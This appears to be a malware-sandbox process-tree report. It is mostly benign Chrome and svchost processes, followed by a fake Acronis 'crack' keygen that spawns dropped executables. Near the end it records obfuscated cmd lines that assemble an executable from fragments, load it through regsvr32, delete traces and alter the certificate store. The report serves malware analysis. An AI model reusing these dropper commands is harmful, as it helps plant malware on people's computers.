C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:82⤵PID:5064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7104 /prefetch:82⤵PID:5100
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7248 /prefetch:82⤵PID:5112
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6596 /prefetch:82⤵PID:4308
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings2⤵PID:4252
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x44,0x248,0x7ff7e76ca890,0x7ff7e76ca8a0,0x7ff7e76ca8b03⤵PID:4380
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7044 /prefetch:82⤵PID:2264
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6604 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6468 /prefetch:82⤵PID:4580
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7324 /prefetch:82⤵PID:4440
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6976 /prefetch:82⤵PID:4664
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:82⤵PID:1084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7160 /prefetch:82⤵PID:4288
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:82⤵PID:4964
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5888 /prefetch:82⤵PID:5012
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:5044
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:82⤵PID:5096
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5796 /prefetch:82⤵PID:2060
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5784 /prefetch:82⤵PID:4344
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7592 /prefetch:82⤵PID:3876
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7732 /prefetch:82⤵PID:4548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7872 /prefetch:82⤵PID:3960
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7884 /prefetch:82⤵PID:5108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8264 /prefetch:82⤵PID:4472
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8404 /prefetch:82⤵PID:4280
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8204 /prefetch:82⤵PID:4960
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7840 /prefetch:82⤵PID:5040
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8556 /prefetch:82⤵PID:5084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8568 /prefetch:82⤵PID:5076
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8580 /prefetch:82⤵PID:5128
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8540 /prefetch:82⤵PID:5116
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7860 /prefetch:82⤵PID:5212
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6392 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5252 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3988 /prefetch:82⤵PID:5320
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3468 /prefetch:82⤵PID:5332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵PID:5396
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:12⤵PID:5452
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8904 /prefetch:12⤵PID:5532
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9020 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5600 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:82⤵PID:5652
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9120 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5692 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9144 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5740 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=776 /prefetch:82⤵PID:5780
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8616 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5796 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8616 /prefetch:82⤵PID:5884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:82⤵PID:5928
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\91.263.200\software_reporter_tool.exe"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\91.263.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=LPXgXS7zDI82Cqh4oGcGOzaEyFJ3Ky8BaGqAhI9p --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5964 -
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=91.263.200 --initial-client-data=0x244,0x248,0x24c,0x214,0x250,0x7ff70ed03270,0x7ff70ed03280,0x7ff70ed032903⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6012 -
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_5964_LGZTVMBEYVXXUYXI" --sandboxed-process-id=2 --init-done-notifier=692 --sandbox-mojo-pipe-token=11966560470509622693 --mojo-platform-channel-handle=668 --engine=23⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6076 -
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_5964_LGZTVMBEYVXXUYXI" --sandboxed-process-id=3 --init-done-notifier=912 --sandbox-mojo-pipe-token=10323606084823434485 --mojo-platform-channel-handle=9083⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6096 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1588 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5972 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5088 /prefetch:82⤵PID:6124
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2032 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4952 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 /prefetch:82⤵PID:4216
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8056 /prefetch:82⤵PID:4836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 /prefetch:82⤵PID:4628
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6740 /prefetch:82⤵PID:4992
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2044 /prefetch:82⤵PID:3956
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 /prefetch:82⤵PID:5284
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9156 /prefetch:82⤵PID:3424
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8116 /prefetch:82⤵PID:2360
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1012 /prefetch:82⤵PID:4212
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:82⤵PID:5380
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3540 /prefetch:82⤵PID:5356
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8948 /prefetch:82⤵PID:4232
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7876 /prefetch:82⤵PID:2844
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1076 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4436
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2720
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2556
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1956
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1420
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1236
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:396
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:2060 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4232
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Acronis_Backup_For_Vmware_9_0_crack.zip\Acronis_Backup_For_Vmware_9_0_crack.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Acronis_Backup_For_Vmware_9_0_crack.zip\Acronis_Backup_For_Vmware_9_0_crack.exe"1⤵PID:5672
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:6104 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exekeygen-step-5.exe3⤵
- Executes dropped EXE
PID:1772 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"> ..\DuAHpZZ.eXe && START ..\DuaHPZz.exe /PFYuNZ3YH7rnGdojnKG & IF "" =="" for%a in ("C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -im "%~nxa" > nUL4⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\DuAHpZZ.eXe..\DuaHPZz.exe /PFYuNZ3YH7rnGdojnKG5⤵
- Executes dropped EXE
PID:5080 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\DuAHpZZ.eXe"> ..\DuAHpZZ.eXe && START ..\DuaHPZz.exe /PFYuNZ3YH7rnGdojnKG & IF "/PFYuNZ3YH7rnGdojnKG " =="" for%a in ("C:\Users\Admin\AppData\Local\Temp\DuAHpZZ.eXe" ) do taskkill /F -im "%~nxa" > nUL6⤵PID:4568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /cEChO | sET /p = "MZ" > N_dF.5TS & coPY /b /Y N_df.5TS+ZStGPF.Z + Y5GIu_SZ.Hk + HSUF.~No + YS5KQR.dP +XHHm_.HW+ Fi3ni~X.GT + J_DWF.9I + 2AZqC.EK+ j9KBFF~.BZX+EZMJlRKC.Zv ..\hVzCtOPX.7V > nUl & STaRT regsvr32 /U ..\HVzCtOPx.7V -s & DEl /q * > NUl6⤵PID:6028
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>N_dF.5TS"7⤵PID:3960
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "7⤵PID:3952
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /U ..\HVzCtOPx.7V -s7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:1044 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F -im "keygen-step-5.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4260 -
